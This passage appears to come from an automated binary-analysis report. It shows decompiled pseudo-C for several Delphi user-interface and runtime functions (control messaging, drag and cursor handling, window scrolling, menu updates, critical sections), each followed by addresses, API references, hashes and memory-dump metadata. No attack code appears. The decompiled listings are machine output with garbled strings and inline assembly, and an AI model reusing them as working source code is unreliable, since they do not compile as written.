									if(E004037A4(_t109, _t93) == 0 && E0046FF10(E00403550(_t109, _t86), "TDBEdit") == 0 && E0046FF10(E00403550(_t109, _t86), "TDBMemo") == 0) {
										_t46 = E0044D894(_t85);
										_t131 = _t46;
										if(_t46 != 0) {
											E0047014C(_t85, _t109, _t131);
											_t56 = E0044D590(_t109);
											SendMessageA(E0044D590(_t85), 0x469, _t56, 0);
										}
										 *((intOrPtr*)(_t85 + 0x20c)) = _t109;
										_t96 =  *0x435174; // 0x4351c0
										if(E004037A4(_t109, _t96) != 0) {
											E00408D78( &_v28);
											E00446D74(_t109, _t85, _v28, _t109);
										}
									}
								}
							}
						}
						_pop(_t90);
						 *[fs:eax] = _t90;
						_push(0x470125);
						return E004043D8( &_v28);
					}
					if(E0044D894(_t85) != 0) {
						SendMessageA(E0044D590(_t85), 0x469, 0, 0);
					}
					 *((intOrPtr*)(_t85 + 0x20c)) = 0;
					goto L12;
				}
				_t68 = E0044A2C0( *((intOrPtr*)(__eax + 0x30))) - 1;
				if(_t68 >= 0) {
					_v8 = _t68 + 1;
					_t107 = 0;
					do {
						_t71 = E0044A284( *((intOrPtr*)(_t85 + 0x30)), _t107);
						_t101 =  *0x46d120; // 0x46d16c
						if(E004037A4(_t71, _t101) != 0 && _t85 != E0044A284( *((intOrPtr*)(_t85 + 0x30)), _t107) && _t109 ==  *((intOrPtr*)(E0044A284( *((intOrPtr*)(_t85 + 0x30)), _t107) + 0x20c))) {
							_v24 =  *((intOrPtr*)(_t109 + 8));
							_v20 = 0xb;
							_v16 =  *((intOrPtr*)(E0044A284( *((intOrPtr*)(_t85 + 0x30)), _t107) + 8));
							_v12 = 0xb;
							_t86 =  *0x4bb1f4; // 0x469658
							E0040CBBC(_t85, _t86, 1, _t107, _t109, 1,  &_v24);
							E00403DEC();
						}
						_t107 = _t107 + 1;
						_t16 =  &_v8;
						 *_t16 = _v8 - 1;
					} while ( *_t16 != 0);
				}
			}

0x0046ff49
0x0046ff4b
0x0046ff4e
0x0046ff50
0x0046ff54
0x0046ff55
0x0046ff5a
0x0046ff5d
0x0046ff62
0x0046fff9
0x00470000
0x0047002b
0x0047002d
0x00470041
0x0047004e
0x00470056
0x00470063
0x0047006b
0x00470078
0x004700aa
0x004700af
0x004700b1
0x004700b7
0x004700c0
0x004700d3
0x004700d3
0x004700d8
0x004700e0
0x004700ed
0x004700f9
0x00470103
0x00470103
0x004700ed
0x00470078
0x00470063
0x0047004e
0x0047010a
0x0047010d
0x00470110
0x0047011d
0x0047011d
0x0047000b
0x0047001e
0x0047001e
0x00470025
0x00000000
0x00470025
0x0046ff70
0x0046ff73
0x0046ff7a
0x0046ff7d
0x0046ff7f
0x0046ff84
0x0046ff89
0x0046ff96
0x0046ffbb
0x0046ffbe
0x0046ffcf
0x0046ffd2
0x0046ffdc
0x0046ffe9
0x0046ffee
0x0046ffee
0x0046fff3
0x0046fff4
0x0046fff4
0x0046fff4
0x0046ff7f

APIs

SendMessageA.USER32 ref: 0047001E
SendMessageA.USER32 ref: 004700D3

Strings

TDBMemo, xrefs: 0047009A
TDBEdit, xrefs: 00470085

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: TDBEdit$TDBMemo
API String ID: 3850602802-2833401046
Opcode ID: faa74b04694734372a68e8cc7488cc854d553a016e511a999c0618aa98d420bf
Instruction ID: 954a128f21679f8786b188ed99450de7a380ef1c6ff382640c787c01b6b15da4
Opcode Fuzzy Hash: faa74b04694734372a68e8cc7488cc854d553a016e511a999c0618aa98d420bf
Instruction Fuzzy Hash: B941B470B116008BDB10EF2ADC4169A77A8EF45708F5084BBF884EB396D6BEDD05875D

Uniqueness

Uniqueness Score: -1.00%

Function 00444EFC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00444EFC(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				struct HWND__* _t38;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr* _t53;
				long _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr _t70;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr* _t80;
				long long _t87;

				_t87 = __fp0;
				_t80 = _t79 + 0xfffffff8;
				_t70 = __ecx;
				_t45 = __edx;
				_t77 = __eax;
				 *0x4bcafc = __eax;
				_t24 =  *0x4bcafc; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x4bcb08);
				_t26 =  *0x4bcafc; // 0x0
				_t58 = 0x4bcb08->x; // 0x0
				 *(_t26 + 0xc) = _t58;
				_t59 =  *0x4bcb0c; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
				 *0x4bcb10 = GetCursor();
				_t28 =  *0x4bcafc; // 0x0
				 *0x4bcb04 = E00444110(_t28);
				 *0x4bcb14 = _t70;
				_t60 =  *0x441810; // 0x44185c
				if(E004037A4(_t77, _t60) == 0) {
					__eflags = _t45;
					if(__eflags == 0) {
						 *0x4bcb18 = 0;
					} else {
						 *0x4bcb18 = 1;
					}
				} else {
					_t65 = _t77;
					_t4 = _t65 + 0x44; // 0x44
					_t41 = _t4;
					_t49 =  *_t41;
					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t65 + 0x20)) = 0;
						 *((intOrPtr*)(_t65 + 0x24)) = 0;
					} else {
						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t65 + 0x20)) = __fp0;
						asm("wait");
					}
					_t66 =  *((intOrPtr*)(_t41 + 4));
					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t77 + 0x28)) = 0;
						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
					} else {
						_t53 = _t77;
						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t53 + 0x28)) = _t87;
						asm("wait");
					}
					if(_t45 == 0) {
						 *0x4bcb18 = 0;
					} else {
						 *0x4bcb18 = 2;
						 *((intOrPtr*)( *_t77 + 0x30))();
					}
				}
				_t32 =  *0x4bcafc; // 0x0
				 *0x4bcb1c =  *((intOrPtr*)( *_t32 + 8))();
				_t85 =  *0x4bcb1c;
				if( *0x4bcb1c != 0) {
					_t37 =  *0x4bcb0c; // 0x0
					_t38 = GetDesktopWindow();
					_t39 =  *0x4bcb1c; // 0x0
					E0044F0B4(_t39, _t38, _t85, _t37);
				}
				_t35 = E004035DC(1);
				 *0x4bcb24 = _t35;
				if( *0x4bcb18 != 0) {
					_t35 = E00444C2C(0x4bcb08, 1);
				}
				return _t35;
			}

0x00444efc
0x00444eff
0x00444f02
0x00444f04
0x00444f06
0x00444f08
0x00444f0e
0x00444f15
0x00444f1d
0x00444f22
0x00444f27
0x00444f2d
0x00444f30
0x00444f36
0x00444f3e
0x00444f43
0x00444f4d
0x00444f52
0x00444f5a
0x00444f67
0x00444ff9
0x00444ffb
0x00445006
0x00444ffd
0x00444ffd
0x00444ffd
0x00444f6d
0x00444f6d
0x00444f6f
0x00444f6f
0x00444f75
0x00444f7b
0x00444f9d
0x00444f9f
0x00444fa2
0x00444f7d
0x00444f82
0x00444f85
0x00444f8d
0x00444f91
0x00444f95
0x00444f97
0x00444f9a
0x00444f9a
0x00444fa8
0x00444faf
0x00444fd4
0x00444fd6
0x00444fd9
0x00444fb1
0x00444fb1
0x00444fb8
0x00444fbb
0x00444fc4
0x00444fc8
0x00444fcc
0x00444fce
0x00444fd1
0x00444fd1
0x00444fde
0x00444ff0
0x00444fe0
0x00444fe0
0x00444feb
0x00444feb
0x00444fde
0x0044500d
0x00445017
0x0044501c
0x00445023
0x00445025
0x0044502b
0x00445038
0x0044503d
0x0044503d
0x00445049
0x0044504e
0x0044505a
0x00445061
0x00445061
0x0044506b

APIs

GetCursorPos.USER32(004BCB08), ref: 00444F1D
GetCursor.USER32 ref: 00444F39

Part of subcall function 00444110: SetCapture.USER32(00000000), ref: 0044411F

GetDesktopWindow.USER32 ref: 0044502B

Strings

\?D, xrefs: 00445044

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$CaptureDesktopWindow
String ID: \?D
API String ID: 669539147-3012075891
Opcode ID: 775c87cd034484c10bc813759c2023dff438fe685f96178183fad7576f21e4ab
Instruction ID: ed8a1a99ec6da19db8c07cbc1885fc7771fd527ae141c19ff58d32121d7f3c14
Opcode Fuzzy Hash: 775c87cd034484c10bc813759c2023dff438fe685f96178183fad7576f21e4ab
Instruction Fuzzy Hash: 8B41AF756082008FD304DF2EE9C5A19BBE1FB88314B15C67ED4888B3A6DB35EC41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0044D148, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044D148(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
				char _t23;
				struct HWND__* _t42;
				void* _t43;
				intOrPtr _t47;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				 *((intOrPtr*)(_t59 + 4)) = __ecx;
				 *_t59 = __edx;
				_t54 = __eax;
				_t42 =  *(__eax + 0x180);
				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
					_t23 = 0;
				} else {
					_t23 = 1;
				}
				 *((char*)(_t59 + 8)) = _t23;
				if( *((char*)(_t59 + 8)) != 0) {
					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
				}
				_t56 = E0044A2C0(_t54) - 1;
				if(_t56 < 0) {
					L14:
					return E00449E48();
				} else {
					_t57 = _t56 + 1;
					_t58 = 0;
					do {
						_t43 = E0044A284(_t54, _t58);
						_t47 =  *0x442c24; // 0x442c70
						if(E004037A4(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
						} else {
							if( *((char*)(_t59 + 8)) == 0) {
								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
							}
						}
						_t58 = _t58 + 1;
						_t57 = _t57 - 1;
					} while (_t57 != 0);
					goto L14;
				}
			}

0x0044d14f
0x0044d153
0x0044d156
0x0044d158
0x0044d160
0x0044d16c
0x0044d170
0x0044d170
0x0044d170
0x0044d172
0x0044d17b
0x0044d192
0x0044d192
0x0044d1a0
0x0044d1a3
0x0044d211
0x0044d21f
0x0044d1a5
0x0044d1a5
0x0044d1a6
0x0044d1a8
0x0044d1b1
0x0044d1b5
0x0044d1c2
0x0044d1d0
0x0044d1d7
0x0044d1dc
0x0044d1e1
0x0044d208
0x0044d208
0x0044d1e1
0x0044d20d
0x0044d20e
0x0044d20e
0x00000000
0x0044d1a8

APIs

IsWindowVisible.USER32(0045F234), ref: 0044D163
ScrollWindow.USER32(0045F234,?,?,00000000,00000000), ref: 0044D192
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044D208

Strings

p,D, xrefs: 0044D1B5

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ScrollVisible
String ID: p,D
API String ID: 4127837035-3811598181
Opcode ID: e4cb3111b9541be118a9da2e6032bf9fa2a48d33a2f6cdb02901db2658669b4e
Instruction ID: bc6344d9b320de87025502649efedb64f8e29c04e4bd2579db7bcb5991660045
Opcode Fuzzy Hash: e4cb3111b9541be118a9da2e6032bf9fa2a48d33a2f6cdb02901db2658669b4e
Instruction Fuzzy Hash: 8C219F71A042006FE711DA69CC80B6BB7E4AF88714F14856EFA488B352D639EC05976A

Uniqueness

Uniqueness Score: -1.00%

Function 00428DB4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00428DB4(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				intOrPtr _t19;
				char _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t38;
				void* _t39;
				void* _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t50;
				void* _t51;

				_t40 = __edx;
				_t39 = __ecx;
				if(__edx != 0) {
					_t51 = _t51 + 0xfffffff0;
					_t19 = E00403984(_t19, _t50);
				}
				_t38 = _t40;
				_t46 = _t19;
				E004035DC(0);
				_t1 = _t46 + 0x38; // 0x38
				L00406C24();
				_t47 = E004282BC(1);
				 *((intOrPtr*)(_t46 + 0xc)) = _t47;
				 *((intOrPtr*)(_t47 + 0xc)) = _t46;
				 *((intOrPtr*)(_t47 + 8)) = 0x429724;
				_t5 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t47 + 0x14)) = _t5;
				_t48 = E004287E8(1);
				 *((intOrPtr*)(_t46 + 0x10)) = _t48;
				 *((intOrPtr*)(_t48 + 0xc)) = _t46;
				 *((intOrPtr*)(_t48 + 8)) = 0x429744;
				_t10 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t48 + 0x14)) = _t10;
				_t49 = E00428AB4(1);
				 *((intOrPtr*)(_t46 + 0x14)) = _t49;
				 *((intOrPtr*)(_t49 + 0xc)) = _t46;
				 *((intOrPtr*)(_t49 + 8)) = 0x429764;
				_t15 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t49 + 0x14)) = _t15;
				 *((intOrPtr*)(_t46 + 0x20)) = 0xcc0020;
				_t32 =  *0x428e74; // 0x0
				 *((char*)(_t46 + 8)) = _t32;
				_t33 =  *0x4bc8e8; // 0x1c40b24
				E0041CB94(_t33, _t38, _t39, _t46, _t49);
				_t35 = _t46;
				if(_t38 != 0) {
					E004039DC(_t35);
					_pop( *[fs:0x0]);
				}
				return _t46;
			}

0x00428db4
0x00428db4
0x00428db9
0x00428dbb
0x00428dbe
0x00428dbe
0x00428dc3
0x00428dc5
0x00428dcb
0x00428dd0
0x00428dd4
0x00428de5
0x00428de7
0x00428dea
0x00428ded
0x00428df4
0x00428df7
0x00428e06
0x00428e08
0x00428e0b
0x00428e0e
0x00428e15
0x00428e18
0x00428e27
0x00428e29
0x00428e2c
0x00428e2f
0x00428e36
0x00428e39
0x00428e3c
0x00428e43
0x00428e48
0x00428e4d
0x00428e52
0x00428e57
0x00428e5b
0x00428e5d
0x00428e62
0x00428e69
0x00428e71

APIs

RtlInitializeCriticalSection.KERNEL32(0042C510,0042C4D8,?,00000001,0042C66E,?,?,?,0042D8E1,?,?,0042D700,?,0000000E,00000000,?), ref: 00428DD4

Strings

pkB, xrefs: 00428DDB
mB, xrefs: 00428E1D
lB, xrefs: 00428DFC

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection
String ID: pkB$lB$mB
API String ID: 32694325-82364836
Opcode ID: 237067b1ff60d7a5bdcf8391008620db356084f6eaf080dae582b76478651ecd
Instruction ID: dbf69811efc71204ac50340997583ca5633be5a5a4e7ada47fef52909b7a8577
Opcode Fuzzy Hash: 237067b1ff60d7a5bdcf8391008620db356084f6eaf080dae582b76478651ecd
Instruction Fuzzy Hash: CF118EB1701A118FC320DF2AE880645BBE8BF94318384863FE459C3B11DB79A919CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0045AECC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0045AECC(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x4bb254; // 0x4bc744
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E0045B280(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E0045B280(_t29) & 0x0000007f) << 0x0000000d) + ((E0045B280(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}

0x0045aece
0x0045aed1
0x0045aed3
0x0045aedc
0x0045aef3
0x0045aef5
0x0045aefc
0x0045af08
0x0045af0c
0x0045af1a
0x0045af21
0x0045af25
0x0045af37
0x0045af3c
0x0045af5a
0x0045af5e
0x0045af6c
0x0045af73
0x00000000
0x0045af79
0x0045af73
0x0045af3c
0x0045af21
0x0045af86

APIs

GetMenuItemInfoA.USER32 ref: 0045AF1A
SetMenuItemInfoA.USER32 ref: 0045AF6C
DrawMenuBar.USER32 ref: 0045AF79

Strings

P, xrefs: 0045AF0C

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$InfoItem$Draw
String ID: P
API String ID: 3227129158-3110715001
Opcode ID: 1e0c374efe4165fa0b74e1ea494cb2e074d90bccaa7aa990911972be7f979cef
Instruction ID: 09410ca087dcb05112c1a174e5d5186d991eaaffd6d5e3d381df6e71b902c4b5
Opcode Fuzzy Hash: 1e0c374efe4165fa0b74e1ea494cb2e074d90bccaa7aa990911972be7f979cef
Instruction Fuzzy Hash: 2E11BC716052006FD320DB28CC85B4B7AE4AB84365F14876AF494CB3EAD778D898C79A

Uniqueness

Uniqueness Score: -1.00%

Function 0042F724, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0042F724(void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t38;

				_t27 = __ecx;
				_push(_t38);
				_push(0x42f7ed);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				 *0x4bc894 =  *0x4bc894 + 1;
				if( *0x4bc894 == 0) {
					_t3 =  *0x4bc8ec; // 0x1c40ac4
					E0040360C(_t3);
					_t5 =  *0x4a08b4; // 0x0
					E0040360C(_t5);
					_t7 =  *0x4a08b0; // 0x0
					E0040360C(_t7);
					E0042C528(__ebx, _t27);
					_t10 =  *0x4a08b8; // 0x1c40ae8
					E0040360C(_t10);
					_t12 =  *0x4bc8e8; // 0x1c40b24
					E0040360C(_t12);
					_t14 =  *0x4bc8dc; // 0x1c40a4c
					E0040360C(_t14);
					_t16 =  *0x4bc8e0; // 0x1c40a74
					E0040360C(_t16);
					_t18 =  *0x4bc8e4; // 0x1c40a9c
					E0040360C(_t18);
					_t20 =  *0x4bc890; // 0xe4080bba
					DeleteObject(_t20);
					_push("�A&");
					L00406AB4();
					_push(0x4bc8c4);
					L00406AB4();
					_t34 =  *0x41b184; // 0x41b188
					E00404E90(0x4a07d0, 0x12, _t34);
					_t35 =  *0x41b184; // 0x41b188
					E00404E90(0x4a0630, 0x34, _t35);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x42f7f4);
				return 0;
			}

0x0042f724
0x0042f729
0x0042f72a
0x0042f72f
0x0042f732
0x0042f735
0x0042f73b
0x0042f741
0x0042f746
0x0042f74b
0x0042f750
0x0042f755
0x0042f75a
0x0042f75f
0x0042f764
0x0042f769
0x0042f76e
0x0042f773
0x0042f778
0x0042f77d
0x0042f782
0x0042f787
0x0042f78c
0x0042f791
0x0042f796
0x0042f79c
0x0042f7a1
0x0042f7a6
0x0042f7ab
0x0042f7b0
0x0042f7bf
0x0042f7c5
0x0042f7d4
0x0042f7da
0x0042f7da
0x0042f7e1
0x0042f7e4
0x0042f7e7
0x0042f7ec

APIs

DeleteObject.GDI32(E4080BBA), ref: 0042F79C
RtlDeleteCriticalSection.KERNEL32(A&,E4080BBA,00000000,0042F7ED), ref: 0042F7A6
RtlDeleteCriticalSection.KERNEL32(004BC8C4,A&,E4080BBA,00000000,0042F7ED), ref: 0042F7B0

Strings

A&, xrefs: 0042F7A1

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete$CriticalSection$Object
String ID: A&
API String ID: 378701848-3747508005
Opcode ID: cdd1848c5c4e2ce5c17adf5f13e3406d688d6ce7d7bb0269ae1306c5030a13a1
Instruction ID: 5a28f3e71ae9a87e69346d5e5dfc1c2dadb5cbc45c57ec85d5fe565f2e5b87d7
Opcode Fuzzy Hash: cdd1848c5c4e2ce5c17adf5f13e3406d688d6ce7d7bb0269ae1306c5030a13a1
Instruction Fuzzy Hash: 9B01DE70340100ABD210BF65ECD391A3BE9E79570A7914A3BF100AB3E2CA7DAD119B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3C4, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E3C4() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x4a0130 = _t1;
				}
				if( *0x4a0130 == 0) {
					 *0x4a0130 = E004093EC;
					return E004093EC;
				}
				return _t1;
			}

0x0040e3ca
0x0040e3cf
0x0040e3d3
0x0040e3db
0x0040e3e0
0x0040e3e0
0x0040e3ec
0x0040e3f3
0x00000000
0x0040e3f3
0x0040e3f9

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040EE8D,00000000,0040EEA0), ref: 0040E3CA
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040EE8D,00000000,0040EEA0), ref: 0040E3DB

Strings

GetDiskFreeSpaceExA, xrefs: 0040E3D5
kernel32.dll, xrefs: 0040E3C5

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 3297197142e193b8ee51b06a66e1645ebf4d4f92996ebf909e442d7c203a4103
Instruction ID: e471eca2aa7091ab47a2834240f2a968c57268bd2a669ffe9bc7cf51e754e08f
Opcode Fuzzy Hash: 3297197142e193b8ee51b06a66e1645ebf4d4f92996ebf909e442d7c203a4103
Instruction Fuzzy Hash: 89D05EB02003119AD7016BA258D568A3ED8A301304F00193BBC41B72C2D77D4820C61D

Uniqueness

Uniqueness Score: -1.00%

Function 00444C2C, Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00444C2C(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x4bcb18 != 0) {
					L3:
					_t49 =  *0x4bcaf8; // 0x0
					_t117 = E00444AF8(_t155,  &_v28, _t49);
					if( *0x4bcb18 == 0) {
						_t168 =  *0x4bcb1c;
						if( *0x4bcb1c != 0) {
							_t106 =  *0x4bcb0c; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x4bcb1c; // 0x0
							E0044F0B4(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x4bcaf8; // 0x0
